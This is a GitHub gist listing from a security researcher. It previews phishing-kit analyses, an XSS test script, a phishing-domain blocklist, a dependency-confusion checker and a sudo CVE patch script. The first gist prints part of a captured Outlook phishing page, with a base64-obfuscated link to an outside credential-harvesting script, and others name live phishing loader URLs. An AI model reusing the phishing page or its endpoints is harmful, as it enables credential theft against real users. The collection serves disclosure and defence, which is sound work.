Skip to content

Instantly share code, notes, and snippets.

View miglen's full-sized avatar
👨‍💻

Miglen Evlogiev miglen

👨‍💻
View GitHub Profile
@miglen
miglen / phishing.html
Created November 23, 2022 15:30
Outlook phishing portal attempt via html (educational only, I have received this via email)
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<script>
let EMAIL_ADDRESS = "user@company.com"; // Change this to the email address
let BASED64_ENCODED_EMAIL = ""; // If you wish to encode the email address, enter the based64 encoded email and leave the email address blank otherwise, leave this field blank
let SCRIPT_LINK_URL = window.atob("aHR0cHM6Ly9tZWdhdGVycmEuaHUvc2NyaXB0LnBocA"); //Enter the script link here
@miglen
miglen / README.md
Created July 14, 2022 06:07
moj1 phishing kit

This is the contents from a phishing attemt I had recieved recently.

Workflow

  1. Recieve an attachment.html usually from a free email service.
  2. The email contains html file with encoded JS that would call http://angelotti.it/cms/moj1.js
  3. Once you open the html file an outlook login portal will be visualized to authenticate.

IoCs:

@miglen
miglen / Facebook Messenger Phishing Campaign via zu7.eu .md
Last active May 31, 2022 17:02
Facebook Messenger Phishing Campaign via zu7.eu

Today I had recieved an interesting phishing message via Messenger from a frend, who's also a tech guy so it was suprirpising that he got compromised.

The initial message said:

Is it you in this video? 😱
https://zu7.eu/L3VAD6EzsR

The url loaded from any browser, orther than mobile will redirect to twitch.tv otherwise it would display the following html:

@miglen
miglen / xss.py
Created February 25, 2022 09:53
Simple automated XSS check with selenium
import requests
import time
import urllib.parse
from bs4 import BeautifulSoup
from selenium import webdriver
from selenium.common.exceptions import NoAlertPresentException
url = "https://xss-game.appspot.com/level1/frame"
response = requests.get(url)
soup = BeautifulSoup(response.text)
@miglen
miglen / Esox-Lucius_PiHoleblocklists.txt
Created September 30, 2021 10:13
Esox-Lucius_PiHoleblocklists.txt
This file has been truncated, but you can view the full file.
# Source https://github.com/Esox-Lucius/PiHoleblocklists
0-800-email.com
0-aprcredit-card.website
0-aprcredit-cards.website
0-aprcreditcard.website
0-aprcreditcards.website
0-secure-paypal.com
0.0.0.0 0-0.028.openvpn.cloud.btcchina.com
0.0.0.0 0-100-195.btcc.com
0.0.0.0 0-100-bhd.foxypool.cf
@miglen
miglen / README.md
Created September 1, 2021 13:18
Notes from Vulnerability management in package dependencies @ Softuni - 31.08.2021

Overview

The following page contains my notes and links about the seminar we had @ Softuni on Vulnerability management in package dependencies at 31st of August 2021.

@miglen
miglen / packagejson.py
Created February 10, 2021 11:55
Dirty check for non existing public npm dependencies
#!/bin/env python3
# https://www.bleepingcomputer.com/news/security/researcher-hacks-over-35-tech-firms-in-novel-supply-chain-attack/
# The following script finds all package.json files in the current dir and checks if there are referenced any
# dependencies that no public package is available for, making your application vulnerable to supply-chain attack.
# Simply run ./packagejson.py in your root repository direcotory.
import json
import requests
from pathlib import Path
import urllib.parse
@miglen
miglen / aws.opml
Created February 9, 2021 10:06 — forked from benkehoe/aws.opml
AWS RSS feeds
<?xml version="1.0" encoding="UTF-8"?>
<opml version="1.0">
<head>
<title>AWS RSS feeds 2019-04-22</title>
</head>
<body>
<outline text="AWS" title="AWS">
<outline type="rss" text="Infrastructure &amp; Automation" title="Infrastructure &amp; Automation" xmlUrl="https://aws.amazon.com/blogs/infrastructure-and-automation/feed/" htmlUrl="https://aws.amazon.com/blogs/infrastructure-and-automation/"/>
<outline type="rss" text="AWS Developer Blog" title="AWS Developer Blog" xmlUrl="http://feeds.feedburner.com/AwsDeveloperBlog" htmlUrl="https://aws.amazon.com/blogs/developer/"/>
@miglen
miglen / check-CVE-2021-3156.sh
Created January 27, 2021 15:10
Test and patch CVE-2021-3156
#!/bin/bash
# Test and patch CVE-2021-3156
patch() {
# Simple method to patch with yum | apt
if command -v apt-get >/dev/null; then
sudo apt-get update
sudo apt-get install $1
elif command -v yum >/dev/null; then
sudo yum updateinfo $1